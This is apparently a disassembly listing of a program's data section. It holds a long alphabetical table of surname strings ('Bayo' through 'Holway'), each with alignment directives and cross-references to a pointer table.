aBayo db 'Bayo',0 ; DATA XREF: _2:00446EDC�o
align 4
aBeacon db 'Beacon',0 ; DATA XREF: _2:00446EE0�o
align 4
aBeal db 'Beal',0 ; DATA XREF: _2:00446EE4�o
align 4
aBean db 'Bean',0 ; DATA XREF: _2:00446EE8�o
align 4
aBeckman db 'Beckman',0 ; DATA XREF: _2:00446EEC�o
aBeder db 'Beder',0 ; DATA XREF: _2:00446EF0�o
align 4
aBedford db 'Bedford',0 ; DATA XREF: _2:00446EF4�o
aBehenna db 'Behenna',0 ; DATA XREF: _2:00446EF8�o
aBelanger db 'Belanger',0 ; DATA XREF: _2:00446EFC�o
align 4
aBelaoussof db 'Belaoussof',0 ; DATA XREF: _2:00446F00�o
align 4
aBelfer db 'Belfer',0 ; DATA XREF: _2:00446F04�o
align 4
aBelinCollart db 'Belin-Collart',0 ; DATA XREF: _2:00446F08�o
align 4
aBellavance db 'Bellavance',0 ; DATA XREF: _2:00446F0C�o
align 4
aBellhouse db 'Bellhouse',0 ; DATA XREF: _2:00446F10�o
align 4
aBellini db 'Bellini',0 ; DATA XREF: _2:00446F14�o
aBelloc db 'Belloc',0 ; DATA XREF: _2:00446F18�o
align 4
aBenedictDye db 'Benedict-Dye',0 ; DATA XREF: _2:00446F1C�o
align 4
aBergson db 'Bergson',0 ; DATA XREF: _2:00446F20�o
aBerkeJenkins db 'Berke-Jenkins',0 ; DATA XREF: _2:00446F24�o
align 4
aBernardo db 'Bernardo',0 ; DATA XREF: _2:00446F28�o
align 4
aBernassola db 'Bernassola',0 ; DATA XREF: _2:00446F2C�o
align 4
aBernston db 'Bernston',0 ; DATA XREF: _2:00446F30�o
align 10h
aBerrizbeitia db 'Berrizbeitia',0 ; DATA XREF: _2:00446F34�o
align 10h
aBetti db 'Betti',0 ; DATA XREF: _2:00446F38�o
align 4
aBeynart db 'Beynart',0 ; DATA XREF: _2:00446F3C�o
aBiagioli db 'Biagioli',0 ; DATA XREF: _2:00446F40�o
align 4
aBickel db 'Bickel',0 ; DATA XREF: _2:00446F44�o
align 4
aBinion db 'Binion',0 ; DATA XREF: _2:00446F48�o
align 4
aBir db 'Bir',0 ; DATA XREF: _2:00446F4C�o
aBisema db 'Bisema',0 ; DATA XREF: _2:00446F50�o
align 4
aBisho db 'Bisho',0 ; DATA XREF: _2:00446F54�o
align 10h
aBlackbourn db 'Blackbourn',0 ; DATA XREF: _2:00446F58�o
align 4
aBlackwell db 'Blackwell',0 ; DATA XREF: _2:00446F5C�o
align 4
aBlagg db 'Blagg',0 ; DATA XREF: _2:00446F60�o
align 10h
aBlakemore db 'Blakemore',0 ; DATA XREF: _2:00446F64�o
align 4
aBlanke db 'Blanke',0 ; DATA XREF: _2:00446F68�o
align 4
aBliss db 'Bliss',0 ; DATA XREF: _2:00446F6C�o
align 4
aBlizard db 'Blizard',0 ; DATA XREF: _2:00446F70�o
aBloch db 'Bloch',0 ; DATA XREF: _2:00446F74�o
align 4
aBloembergen db 'Bloembergen',0 ; DATA XREF: _2:00446F78�o
aBloemhof db 'Bloemhof',0 ; DATA XREF: _2:00446F7C�o
align 4
aBloxham db 'Bloxham',0 ; DATA XREF: _2:00446F80�o
aBlyth db 'Blyth',0 ; DATA XREF: _2:00446F84�o
align 4
aBolger db 'Bolger',0 ; DATA XREF: _2:00446F88�o
align 4
aBolick db 'Bolick',0 ; DATA XREF: _2:00446F8C�o
align 4
aBollinger db 'Bollinger',0 ; DATA XREF: _2:00446F90�o
align 10h
aBologna db 'Bologna',0 ; DATA XREF: _2:00446F94�o
aBoner db 'Boner',0 ; DATA XREF: _2:00446F98�o
align 10h
aBonham db 'Bonham',0 ; DATA XREF: _2:00446F9C�o
align 4
aBoniface db 'Boniface',0 ; DATA XREF: _2:00446FA0�o
align 4
aBontempo db 'Bontempo',0 ; DATA XREF: _2:00446FA4�o
align 10h
aBook db 'Book',0 ; DATA XREF: _2:00446FA8�o
align 4
aBookbinder db 'Bookbinder',0 ; DATA XREF: _2:00446FAC�o
align 4
aBoone db 'Boone',0 ; DATA XREF: _2:00446FB0�o
align 4
aBoorstin db 'Boorstin',0 ; DATA XREF: _2:00446FB4�o
align 4
aBorack db 'Borack',0 ; DATA XREF: _2:00446FB8�o
align 10h
aBorden db 'Borden',0 ; DATA XREF: _2:00446FBC�o
align 4
aBossi db 'Bossi',0 ; DATA XREF: _2:00446FC0�o
align 10h
aBothman db 'Bothman',0 ; DATA XREF: _2:00446FC4�o
aBotosh db 'Botosh',0 ; DATA XREF: _2:00446FC8�o
align 10h
aBoudin db 'Boudin',0 ; DATA XREF: _2:00446FCC�o
align 4
aBoudrot db 'Boudrot',0 ; DATA XREF: _2:00446FD0�o
aBourneuf db 'Bourneuf',0 ; DATA XREF: _2:00446FD4�o
align 4
aBowers db 'Bowers',0 ; DATA XREF: _2:00446FD8�o
align 4
aBoxer db 'Boxer',0 ; DATA XREF: _2:00446FDC�o
align 4
aBoyajian db 'Boyajian',0 ; DATA XREF: _2:00446FE0�o
align 4
aBoyes db 'Boyes',0 ; DATA XREF: _2:00446FE4�o
align 10h
aBoyland db 'Boyland',0 ; DATA XREF: _2:00446FE8�o
aBoym db 'Boym',0 ; DATA XREF: _2:00446FEC�o
align 10h
aBoyne db 'Boyne',0 ; DATA XREF: _2:00446FF0�o
align 4
aBracalente db 'Bracalente',0 ; DATA XREF: _2:00446FF4�o
align 4
aBradac db 'Bradac',0 ; DATA XREF: _2:00446FF8�o
align 4
aBradach db 'Bradach',0 ; DATA XREF: _2:00446FFC�o
aBrecht db 'Brecht',0 ; DATA XREF: _2:00447000�o
align 4
aBreed db 'Breed',0 ; DATA XREF: _2:00447004�o
align 4
aBrenan db 'Brenan',0 ; DATA XREF: _2:00447008�o
align 4
aBrennan db 'Brennan',0 ; DATA XREF: _2:0044700C�o
aBrewer db 'Brewer',0 ; DATA XREF: _2:00447010�o
align 4
aBrewer_0 db 'Brewer',0 ; DATA XREF: _2:00447014�o
align 4
aBridgeman db 'Bridgeman',0 ; DATA XREF: _2:00447018�o
align 10h
aBridges db 'Bridges',0 ; DATA XREF: _2:0044701C�o
aBrinton db 'Brinton',0 ; DATA XREF: _2:00447020�o
aBritz db 'Britz',0 ; DATA XREF: _2:00447024�o
align 4
aBroca db 'Broca',0 ; DATA XREF: _2:00447028�o
align 10h
aBrook db 'Brook',0 ; DATA XREF: _2:0044702C�o
align 4
aBrzycki db 'Brzycki',0 ; DATA XREF: _2:00447030�o
aBuchan db 'Buchan',0 ; DATA XREF: _2:00447034�o
align 4
aBudding db 'Budding',0 ; DATA XREF: _2:00447038�o
aBullard db 'Bullard',0 ; DATA XREF: _2:0044703C�o
aBunton db 'Bunton',0 ; DATA XREF: _2:00447040�o
align 10h
aBurden db 'Burden',0 ; DATA XREF: _2:00447044�o
align 4
aBurdzy db 'Burdzy',0 ; DATA XREF: _2:00447048�o
align 10h
aBurke db 'Burke',0 ; DATA XREF: _2:0044704C�o
align 4
aBurridge db 'Burridge',0 ; DATA XREF: _2:00447050�o
align 4
aBusetta db 'Busetta',0 ; DATA XREF: _2:00447054�o
aByatt db 'Byatt',0 ; DATA XREF: _2:00447058�o
align 4
aByerly db 'Byerly',0 ; DATA XREF: _2:0044705C�o
align 4
aByrd db 'Byrd',0 ; DATA XREF: _2:00447060�o
align 4
aCage db 'Cage',0 ; DATA XREF: _2:00447064�o
align 4
aCalnan db 'Calnan',0 ; DATA XREF: _2:00447068�o
align 4
aCammelli db 'Cammelli',0 ; DATA XREF: _2:0044706C�o
align 10h
aCammilleri db 'Cammilleri',0 ; DATA XREF: _2:00447070�o
align 4
aCanley db 'Canley',0 ; DATA XREF: _2:00447074�o
align 4
aCapanni db 'Capanni',0 ; DATA XREF: _2:00447078�o
aCaperton db 'Caperton',0 ; DATA XREF: _2:0044707C�o
align 4
aCapocaccia db 'Capocaccia',0 ; DATA XREF: _2:00447080�o
align 4
aCapodilupo db 'Capodilupo',0 ; DATA XREF: _2:00447084�o
align 10h
aCappuccio db 'Cappuccio',0 ; DATA XREF: _2:00447088�o
align 4
aCapursi db 'Capursi',0 ; DATA XREF: _2:0044708C�o
aCaratozzolo db 'Caratozzolo',0 ; DATA XREF: _2:00447090�o
aCarayannopoulo db 'Carayannopoulos',0 ; DATA XREF: _2:00447094�o
aCarlin db 'Carlin',0 ; DATA XREF: _2:00447098�o
align 4
aCarlos db 'Carlos',0 ; DATA XREF: _2:0044709C�o
align 10h
aCarlyle db 'Carlyle',0 ; DATA XREF: _2:004470A0�o
aCarmichael db 'Carmichael',0 ; DATA XREF: _2:004470A4�o
align 4
aCaroti db 'Caroti',0 ; DATA XREF: _2:004470A8�o
align 4
aCarper db 'Carper',0 ; DATA XREF: _2:004470AC�o
align 4
aCartmill db 'Cartmill',0 ; DATA XREF: _2:004470B0�o
align 10h
aCascio db 'Cascio',0 ; DATA XREF: _2:004470B4�o
align 4
aCase db 'Case',0 ; DATA XREF: _2:004470B8�o
align 10h
aCaspar db 'Caspar',0 ; DATA XREF: _2:004470BC�o
align 4
aCastelda db 'Castelda',0 ; DATA XREF: _2:004470C0�o
align 4
aCavanagh db 'Cavanagh',0 ; DATA XREF: _2:004470C4�o
align 10h
aCavell db 'Cavell',0 ; DATA XREF: _2:004470C8�o
align 4
aCeniceros db 'Ceniceros',0 ; DATA XREF: _2:004470CC�o
align 4
aCerioli db 'Cerioli',0 ; DATA XREF: _2:004470D0�o
aChapman db 'Chapman',0 ; DATA XREF: _2:004470D4�o
aCharles db 'Charles',0 ; DATA XREF: _2:004470D8�o
aCheang db 'Cheang',0 ; DATA XREF: _2:004470DC�o
align 4
aCherry db 'Cherry',0 ; DATA XREF: _2:004470E0�o
align 4
aChervinsky db 'Chervinsky',0 ; DATA XREF: _2:004470E4�o
align 4
aChiassino db 'Chiassino',0 ; DATA XREF: _2:004470E8�o
align 4
aChien db 'Chien',0 ; DATA XREF: _2:004470EC�o
align 4
aChildress db 'Childress',0 ; DATA XREF: _2:004470F0�o
align 4
aChilds db 'Childs',0 ; DATA XREF: _2:004470F4�o
align 10h
aChinipardaz db 'Chinipardaz',0 ; DATA XREF: _2:004470F8�o
aChinman db 'Chinman',0 ; DATA XREF: _2:004470FC�o
aChristenson db 'Christenson',0 ; DATA XREF: _2:00447100�o
aChristian db 'Christian',0 ; DATA XREF: _2:00447104�o
align 4
aChristiano db 'Christiano',0 ; DATA XREF: _2:00447108�o
align 4
aChristie db 'Christie',0 ; DATA XREF: _2:0044710C�o
align 4
aChristopher db 'Christopher',0 ; DATA XREF: _2:00447110�o
aChu db 'Chu',0 ; DATA XREF: _2:00447114�o
aChupasko db 'Chupasko',0 ; DATA XREF: _2:00447118�o
align 10h
aChurch db 'Church',0 ; DATA XREF: _2:0044711C�o
align 4
aCiampaglia db 'Ciampaglia',0 ; DATA XREF: _2:00447120�o
align 4
aCicero db 'Cicero',0 ; DATA XREF: _2:00447124�o
align 4
aCifarelli db 'Cifarelli',0 ; DATA XREF: _2:00447128�o
align 4
aClaffey db 'Claffey',0 ; DATA XREF: _2:0044712C�o
aClancy db 'Clancy',0 ; DATA XREF: _2:00447130�o
align 4
aClark db 'Clark',0 ; DATA XREF: _2:00447134�o
align 10h
aClement db 'Clement',0 ; DATA XREF: _2:00447138�o
aClifton db 'Clifton',0 ; DATA XREF: _2:0044713C�o
aClow db 'Clow',0 ; DATA XREF: _2:00447140�o
align 4
aCoblenz db 'Coblenz',0 ; DATA XREF: _2:00447144�o
aCoito db 'Coito',0 ; DATA XREF: _2:00447148�o
align 4
aColdren db 'Coldren',0 ; DATA XREF: _2:0044714C�o
aColella db 'Colella',0 ; DATA XREF: _2:00447150�o
aCollard db 'Collard',0 ; DATA XREF: _2:00447154�o
aCollis db 'Collis',0 ; DATA XREF: _2:00447158�o
align 4
aCompton db 'Compton',0 ; DATA XREF: _2:0044715C�o
aCompton_0 db 'Compton',0 ; DATA XREF: _2:00447160�o
aComstock db 'Comstock',0 ; DATA XREF: _2:00447164�o
align 4
aConcino db 'Concino',0 ; DATA XREF: _2:00447168�o
aCondodina db 'Condodina',0 ; DATA XREF: _2:0044716C�o
align 4
aConnors db 'Connors',0 ; DATA XREF: _2:00447170�o
aCorey db 'Corey',0 ; DATA XREF: _2:00447174�o
align 4
aCornish db 'Cornish',0 ; DATA XREF: _2:00447178�o
aCosmides db 'Cosmides',0 ; DATA XREF: _2:0044717C�o
align 4
aCounter db 'Counter',0 ; DATA XREF: _2:00447180�o
aCoutaux db 'Coutaux',0 ; DATA XREF: _2:00447184�o
aCrawford db 'Crawford',0 ; DATA XREF: _2:00447188�o
align 4
aCrocker db 'Crocker',0 ; DATA XREF: _2:0044718C�o
aCroshaw db 'Croshaw',0 ; DATA XREF: _2:00447190�o
aCroxen db 'Croxen',0 ; DATA XREF: _2:00447194�o
align 10h
aCroxton db 'Croxton',0 ; DATA XREF: _2:00447198�o
aCui db 'Cui',0 ; DATA XREF: _2:0044719C�o
aCurrier db 'Currier',0 ; DATA XREF: _2:004471A0�o
aCutler db 'Cutler',0 ; DATA XREF: _2:004471A4�o
align 4
aCvek db 'Cvek',0 ; DATA XREF: _2:004471A8�o
align 4
aCyders db 'Cyders',0 ; DATA XREF: _2:004471AC�o
align 4
aDasilva db 'daSilva',0 ; DATA XREF: _2:004471B0�o
aDaldalian db 'Daldalian',0 ; DATA XREF: _2:004471B4�o
align 10h
aDaly db 'Daly',0 ; DATA XREF: _2:004471B8�o
align 4
aDAmbra db 'D',27h,'Ambra',0 ; DATA XREF: _2:004471BC�o
aDanieli db 'Danieli',0 ; DATA XREF: _2:004471C0�o
aDante db 'Dante',0 ; DATA XREF: _2:004471C4�o
align 10h
aDapice db 'Dapice',0 ; DATA XREF: _2:004471C8�o
align 4
aDArcangelo db 'D',27h,'arcangelo',0 ; DATA XREF: _2:004471CC�o
aDas db 'Das',0 ; DATA XREF: _2:004471D0�o
aDasgupta db 'Dasgupta',0 ; DATA XREF: _2:004471D4�o
align 4
aDaskalu db 'Daskalu',0 ; DATA XREF: _2:004471D8�o
aDavid db 'David',0 ; DATA XREF: _2:004471DC�o
align 4
aDawkins db 'Dawkins',0 ; DATA XREF: _2:004471E0�o
aDegennaro db 'DeGennaro',0 ; DATA XREF: _2:004471E4�o
align 4
aDelapena db 'DeLaPena',0 ; DATA XREF: _2:004471E8�o
align 4
aDelEnclos db 'del',27h,'Enclos',0 ; DATA XREF: _2:004471EC�o
align 10h
aDerousse db 'deRousse',0 ; DATA XREF: _2:004471F0�o
align 4
aDebroff db 'Debroff',0 ; DATA XREF: _2:004471F4�o
aDees db 'Dees',0 ; DATA XREF: _2:004471F8�o
align 4
aDefeciani db 'Defeciani',0 ; DATA XREF: _2:004471FC�o
align 4
aDelattre db 'Delattre',0 ; DATA XREF: _2:00447200�o
align 4
aDeleonRendon db 'Deleon-Rendon',0 ; DATA XREF: _2:00447204�o
align 4
aDelger db 'Delger',0 ; DATA XREF: _2:00447208�o
align 4
aDellAcqua db 'Dell',27h,'acqua',0 ; DATA XREF: _2:0044720C�o
align 4
aDeming db 'Deming',0 ; DATA XREF: _2:00447210�o
align 10h
aDempster db 'Dempster',0 ; DATA XREF: _2:00447214�o
align 4
aDemusz db 'Demusz',0 ; DATA XREF: _2:00447218�o
align 4
aDenault db 'Denault',0 ; DATA XREF: _2:0044721C�o
aDenham db 'Denham',0 ; DATA XREF: _2:00447220�o
align 4
aDenison db 'Denison',0 ; DATA XREF: _2:00447224�o
aDesombre db 'Desombre',0 ; DATA XREF: _2:00447228�o
align 4
aDeutsch db 'Deutsch',0 ; DATA XREF: _2:0044722C�o
aDFini db 'D',27h,'fini',0 ; DATA XREF: _2:00447230�o
align 4
aDicks db 'Dicks',0 ; DATA XREF: _2:00447234�o
align 10h
aDiefenbach db 'Diefenbach',0 ; DATA XREF: _2:00447238�o
align 4
aDifabio db 'Difabio',0 ; DATA XREF: _2:0044723C�o
aDifronzo db 'Difronzo',0 ; DATA XREF: _2:00447240�o
align 10h
aDilworth db 'Dilworth',0 ; DATA XREF: _2:00447244�o
align 4
aDionysius db 'Dionysius',0 ; DATA XREF: _2:00447248�o
align 4
aDirksen db 'Dirksen',0 ; DATA XREF: _2:0044724C�o
aDockery db 'Dockery',0 ; DATA XREF: _2:00447250�o
aDoherty db 'Doherty',0 ; DATA XREF: _2:00447254�o
aDonahue db 'Donahue',0 ; DATA XREF: _2:00447258�o
aDonner db 'Donner',0 ; DATA XREF: _2:0044725C�o
align 10h
aDoonan db 'Doonan',0 ; DATA XREF: _2:00447260�o
align 4
aDore db 'Dore',0 ; DATA XREF: _2:00447264�o
align 10h
aDorf db 'Dorf',0 ; DATA XREF: _2:00447268�o
align 4
aDosi db 'Dosi',0 ; DATA XREF: _2:0044726C�o
align 10h
aDoty db 'Doty',0 ; DATA XREF: _2:00447270�o
align 4
aDoug db 'Doug',0 ; DATA XREF: _2:00447274�o
align 10h
aDowsland db 'Dowsland',0 ; DATA XREF: _2:00447278�o
align 4
aDrinker db 'Drinker',0 ; DATA XREF: _2:0044727C�o
aDSouza db 'D',27h,'souza',0 ; DATA XREF: _2:00447280�o
aDuffin db 'Duffin',0 ; DATA XREF: _2:00447284�o
align 4
aDurrett db 'Durrett',0 ; DATA XREF: _2:00447288�o
aDussault db 'Dussault',0 ; DATA XREF: _2:0044728C�o
align 4
aDwyer db 'Dwyer',0 ; DATA XREF: _2:00447290�o
align 10h
aEardley db 'Eardley',0 ; DATA XREF: _2:00447294�o
aEbeling db 'Ebeling',0 ; DATA XREF: _2:00447298�o
aEckel db 'Eckel',0 ; DATA XREF: _2:0044729C�o
align 4
aEdley db 'Edley',0 ; DATA XREF: _2:004472A0�o
align 10h
aEdner db 'Edner',0 ; DATA XREF: _2:004472A4�o
align 4
aEdward db 'Edward',0 ; DATA XREF: _2:004472A8�o
align 10h
aEickenhorst db 'Eickenhorst',0 ; DATA XREF: _2:004472AC�o
aEliasson db 'Eliasson',0 ; DATA XREF: _2:004472B0�o
align 4
aElmendorf db 'Elmendorf',0 ; DATA XREF: _2:004472B4�o
align 4
aElmerick db 'Elmerick',0 ; DATA XREF: _2:004472B8�o
align 10h
aElvis db 'Elvis',0 ; DATA XREF: _2:004472BC�o
align 4
aEncinas db 'Encinas',0 ; DATA XREF: _2:004472C0�o
aEnyeart db 'Enyeart',0 ; DATA XREF: _2:004472C4�o
aEppling db 'Eppling',0 ; DATA XREF: _2:004472C8�o
aErbach db 'Erbach',0 ; DATA XREF: _2:004472CC�o
align 4
aErdman db 'Erdman',0 ; DATA XREF: _2:004472D0�o
align 10h
aErdos db 'Erdos',0 ; DATA XREF: _2:004472D4�o
align 4
aErez db 'Erez',0 ; DATA XREF: _2:004472D8�o
align 10h
aEspinoza db 'Espinoza',0 ; DATA XREF: _2:004472DC�o
align 4
aEstes db 'Estes',0 ; DATA XREF: _2:004472E0�o
align 4
aEtter db 'Etter',0 ; DATA XREF: _2:004472E4�o
align 4
aEuripides db 'Euripides',0 ; DATA XREF: _2:004472E8�o
align 4
aEverett db 'Everett',0 ; DATA XREF: _2:004472EC�o
aFabbris db 'Fabbris',0 ; DATA XREF: _2:004472F0�o
aFagan db 'Fagan',0 ; DATA XREF: _2:004472F4�o
align 10h
aFaioes db 'Faioes',0 ; DATA XREF: _2:004472F8�o
align 4
aFalcoAcosta db 'Falco-Acosta',0 ; DATA XREF: _2:004472FC�o
align 4
aFalorsi db 'Falorsi',0 ; DATA XREF: _2:00447300�o
aFaris db 'Faris',0 ; DATA XREF: _2:00447304�o
align 4
aFarone db 'Farone',0 ; DATA XREF: _2:00447308�o
align 10h
aFarren db 'Farren',0 ; DATA XREF: _2:0044730C�o
align 4
aFasso db 'Fasso',27h,0 ; DATA XREF: _2:00447310�o
align 10h
aFates db 'Fates',0 ; DATA XREF: _2:00447314�o
align 4
aFeigenbaum db 'Feigenbaum',0 ; DATA XREF: _2:00447318�o
align 4
aFejzo db 'Fejzo',0 ; DATA XREF: _2:0044731C�o
align 4
aFeldman db 'Feldman',0 ; DATA XREF: _2:00447320�o
aFernald db 'Fernald',0 ; DATA XREF: _2:00447324�o
aFernandes db 'Fernandes',0 ; DATA XREF: _2:00447328�o
align 4
aFerrante db 'Ferrante',0 ; DATA XREF: _2:0044732C�o
align 4
aFerriell db 'Ferriell',0 ; DATA XREF: _2:00447330�o
align 10h
aFeuer db 'Feuer',0 ; DATA XREF: _2:00447334�o
align 4
aFido db 'Fido',0 ; DATA XREF: _2:00447338�o
align 10h
aField db 'Field',0 ; DATA XREF: _2:0044733C�o
align 4
aFink db 'Fink',0 ; DATA XREF: _2:00447340�o
align 10h
aFinkelstein db 'Finkelstein',0 ; DATA XREF: _2:00447344�o
aFinnegan db 'Finnegan',0 ; DATA XREF: _2:00447348�o
align 4
aFiorina db 'Fiorina',0 ; DATA XREF: _2:0044734C�o
aFisk db 'Fisk',0 ; DATA XREF: _2:00447350�o
align 4
aFitzmaurice db 'Fitzmaurice',0 ; DATA XREF: _2:00447354�o
aFlier db 'Flier',0 ; DATA XREF: _2:00447358�o
align 4
aFlores db 'Flores',0 ; DATA XREF: _2:0044735C�o
align 4
aFolks db 'Folks',0 ; DATA XREF: _2:00447360�o
align 4
aForester db 'Forester',0 ; DATA XREF: _2:00447364�o
align 4
aFortes db 'Fortes',0 ; DATA XREF: _2:00447368�o
align 10h
aFortier db 'Fortier',0 ; DATA XREF: _2:0044736C�o
aFossey db 'Fossey',0 ; DATA XREF: _2:00447370�o
align 10h
aFossi db 'Fossi',0 ; DATA XREF: _2:00447374�o
align 4
aFrancisco db 'Francisco',0 ; DATA XREF: _2:00447378�o
align 4
aFranklinKenea db 'Franklin-Kenea',0 ; DATA XREF: _2:0044737C�o
align 4
aFranz db 'Franz',0 ; DATA XREF: _2:00447380�o
align 4
aFrazierDavis db 'Frazier-Davis',0 ; DATA XREF: _2:00447384�o
align 4
aFreid db 'Freid',0 ; DATA XREF: _2:00447388�o
align 4
aFreundlich db 'Freundlich',0 ; DATA XREF: _2:0044738C�o
align 10h
aFried db 'Fried',0 ; DATA XREF: _2:00447390�o
align 4
aFriedland db 'Friedland',0 ; DATA XREF: _2:00447394�o
align 4
aFrisken db 'Frisken',0 ; DATA XREF: _2:00447398�o
aFrowiss db 'Frowiss',0 ; DATA XREF: _2:0044739C�o
aFryberger db 'Fryberger',0 ; DATA XREF: _2:004473A0�o
align 10h
aFrye db 'Frye',0 ; DATA XREF: _2:004473A4�o
align 4
aFujiiAbe db 'Fujii-Abe',0 ; DATA XREF: _2:004473A8�o
align 4
aFuller db 'Fuller',0 ; DATA XREF: _2:004473AC�o
align 4
aFurth db 'Furth',0 ; DATA XREF: _2:004473B0�o
align 4
aFusaro db 'Fusaro',0 ; DATA XREF: _2:004473B4�o
align 4
aGabrielli db 'Gabrielli',0 ; DATA XREF: _2:004473B8�o
align 4
aGaggiotti db 'Gaggiotti',0 ; DATA XREF: _2:004473BC�o
align 4
aGaleotti db 'Galeotti',0 ; DATA XREF: _2:004473C0�o
align 10h
aGalwey db 'Galwey',0 ; DATA XREF: _2:004473C4�o
align 4
aGambini db 'Gambini',0 ; DATA XREF: _2:004473C8�o
aGarfield db 'Garfield',0 ; DATA XREF: _2:004473CC�o
align 4
aGarman db 'Garman',0 ; DATA XREF: _2:004473D0�o
align 4
aGaronna db 'Garonna',0 ; DATA XREF: _2:004473D4�o
aGeller db 'Geller',0 ; DATA XREF: _2:004473D8�o
align 4
aGemberling db 'Gemberling',0 ; DATA XREF: _2:004473DC�o
align 10h
aGeorgi db 'Georgi',0 ; DATA XREF: _2:004473E0�o
align 4
aGerrett db 'Gerrett',0 ; DATA XREF: _2:004473E4�o
aGhorai db 'Ghorai',0 ; DATA XREF: _2:004473E8�o
align 4
aGibbens db 'Gibbens',0 ; DATA XREF: _2:004473EC�o
aGibson db 'Gibson',0 ; DATA XREF: _2:004473F0�o
align 4
aGilbert db 'Gilbert',0 ; DATA XREF: _2:004473F4�o
aGili db 'Gili',0 ; DATA XREF: _2:004473F8�o
align 4
aGill db 'Gill',0 ; DATA XREF: _2:004473FC�o
align 10h
aGillispie db 'Gillispie',0 ; DATA XREF: _2:00447400�o
align 4
aGist db 'Gist',0 ; DATA XREF: _2:00447404�o
align 4
aGleason db 'Gleason',0 ; DATA XREF: _2:00447408�o
aGlegg db 'Glegg',0 ; DATA XREF: _2:0044740C�o
align 4
aGlendon db 'Glendon',0 ; DATA XREF: _2:00447410�o
aGoldfarb db 'Goldfarb',0 ; DATA XREF: _2:00447414�o
align 4
aGoncalves db 'Goncalves',0 ; DATA XREF: _2:00447418�o
align 4
aGood db 'Good',0 ; DATA XREF: _2:0044741C�o
align 4
aGoodearl db 'Goodearl',0 ; DATA XREF: _2:00447420�o
align 4
aGoody db 'Goody',0 ; DATA XREF: _2:00447424�o
align 10h
aGozzi db 'Gozzi',0 ; DATA XREF: _2:00447428�o
align 4
aGravell db 'Gravell',0 ; DATA XREF: _2:0044742C�o
aGreenberg db 'Greenberg',0 ; DATA XREF: _2:00447430�o
align 4
aGreenfeld db 'Greenfeld',0 ; DATA XREF: _2:00447434�o
align 4
aGriffiths db 'Griffiths',0 ; DATA XREF: _2:00447438�o
align 4
aGrigoletto db 'Grigoletto',0 ; DATA XREF: _2:0044743C�o
align 10h
aGrummell db 'Grummell',0 ; DATA XREF: _2:00447440�o
align 4
aGruner db 'Gruner',0 ; DATA XREF: _2:00447444�o
align 4
aGruppe db 'Gruppe',0 ; DATA XREF: _2:00447448�o
align 4
aGuenthart db 'Guenthart',0 ; DATA XREF: _2:0044744C�o
align 4
aGunn db 'Gunn',0 ; DATA XREF: _2:00447450�o
align 10h
aGuo db 'Guo',0 ; DATA XREF: _2:00447454�o
aHa db 'Ha',0 ; DATA XREF: _2:00447458�o
align 4
aHaar db 'Haar',0 ; DATA XREF: _2:0044745C�o
align 10h
aHackman db 'Hackman',0 ; DATA XREF: _2:00447460�o
aHackshaw db 'Hackshaw',0 ; DATA XREF: _2:00447464�o
align 4
aHaley db 'Haley',0 ; DATA XREF: _2:00447468�o
align 4
aHalkias db 'Halkias',0 ; DATA XREF: _2:0044746C�o
aHallowell db 'Hallowell',0 ; DATA XREF: _2:00447470�o _2:004548D8�o
align 10h
aHalpert db 'Halpert',0 ; DATA XREF: _2:00447474�o
aHambarzumjan db 'Hambarzumjan',0 ; DATA XREF: _2:00447478�o
align 4
aHamer db 'Hamer',0 ; DATA XREF: _2:0044747C�o
align 10h
aHammerness db 'Hammerness',0 ; DATA XREF: _2:00447480�o
align 4
aHand db 'Hand',0 ; DATA XREF: _2:00447484�o
align 4
aHanssen db 'Hanssen',0 ; DATA XREF: _2:00447488�o
aHarding db 'Harding',0 ; DATA XREF: _2:0044748C�o
aHargraves db 'Hargraves',0 ; DATA XREF: _2:00447490�o
align 10h
aHarlow db 'Harlow',0 ; DATA XREF: _2:00447494�o
align 4
aHarrigan db 'Harrigan',0 ; DATA XREF: _2:00447498�o
align 4
aHartman db 'Hartman',0 ; DATA XREF: _2:0044749C�o
aHartmann db 'Hartmann',0 ; DATA XREF: _2:004474A0�o
align 4
aHartnett db 'Hartnett',0 ; DATA XREF: _2:004474A4�o
align 4
aHarwell db 'Harwell',0 ; DATA XREF: _2:004474A8�o
aHaviaras db 'Haviaras',0 ; DATA XREF: _2:004474AC�o
align 4
aHawkes db 'Hawkes',0 ; DATA XREF: _2:004474B0�o
align 10h
aHayes db 'Hayes',0 ; DATA XREF: _2:004474B4�o
align 4
aHaynes db 'Haynes',0 ; DATA XREF: _2:004474B8�o
align 10h
aHazlewood db 'Hazlewood',0 ; DATA XREF: _2:004474BC�o
align 4
aHeermans db 'Heermans',0 ; DATA XREF: _2:004474C0�o
align 4
aHeft db 'Heft',0 ; DATA XREF: _2:004474C4�o
align 10h
aHeiland db 'Heiland',0 ; DATA XREF: _2:004474C8�o
aHellman db 'Hellman',0 ; DATA XREF: _2:004474CC�o
aHellmiss db 'Hellmiss',0 ; DATA XREF: _2:004474D0�o
align 4
aHelprin db 'Helprin',0 ; DATA XREF: _2:004474D4�o
aHemphill db 'Hemphill',0 ; DATA XREF: _2:004474D8�o
align 10h
aHenery db 'Henery',0 ; DATA XREF: _2:004474DC�o
align 4
aHenrichs db 'Henrichs',0 ; DATA XREF: _2:004474E0�o
align 4
aHernandez db 'Hernandez',0 ; DATA XREF: _2:004474E4�o
align 10h
aHerrera db 'Herrera',0 ; DATA XREF: _2:004474E8�o
aHester db 'Hester',0 ; DATA XREF: _2:004474EC�o
align 10h
aHeubert db 'Heubert',0 ; DATA XREF: _2:004474F0�o
aHeyeck db 'Heyeck',0 ; DATA XREF: _2:004474F4�o
align 10h
aHimmelfarb db 'Himmelfarb',0 ; DATA XREF: _2:004474F8�o
align 4
aHind db 'Hind',0 ; DATA XREF: _2:004474FC�o
align 4
aHirst db 'Hirst',0 ; DATA XREF: _2:00447500�o
align 4
aHitchcock db 'Hitchcock',0 ; DATA XREF: _2:00447504�o
align 4
aHoang db 'Hoang',0 ; DATA XREF: _2:00447508�o
align 10h
aHock db 'Hock',0 ; DATA XREF: _2:0044750C�o
align 4
aHoffer db 'Hoffer',0 ; DATA XREF: _2:00447510�o
align 10h
aHoffman db 'Hoffman',0 ; DATA XREF: _2:00447514�o
aHokanson db 'Hokanson',0 ; DATA XREF: _2:00447518�o
align 4
aHokoda db 'Hokoda',0 ; DATA XREF: _2:0044751C�o
align 4
aHolmes db 'Holmes',0 ; DATA XREF: _2:00447520�o
align 4
aHoloien db 'Holoien',0 ; DATA XREF: _2:00447524�o
aHolter db 'Holter',0 ; DATA XREF: _2:00447528�o
align 4
aHolway db 'Holway',0 ; DATA XREF: _2:0044752C�o
align 4
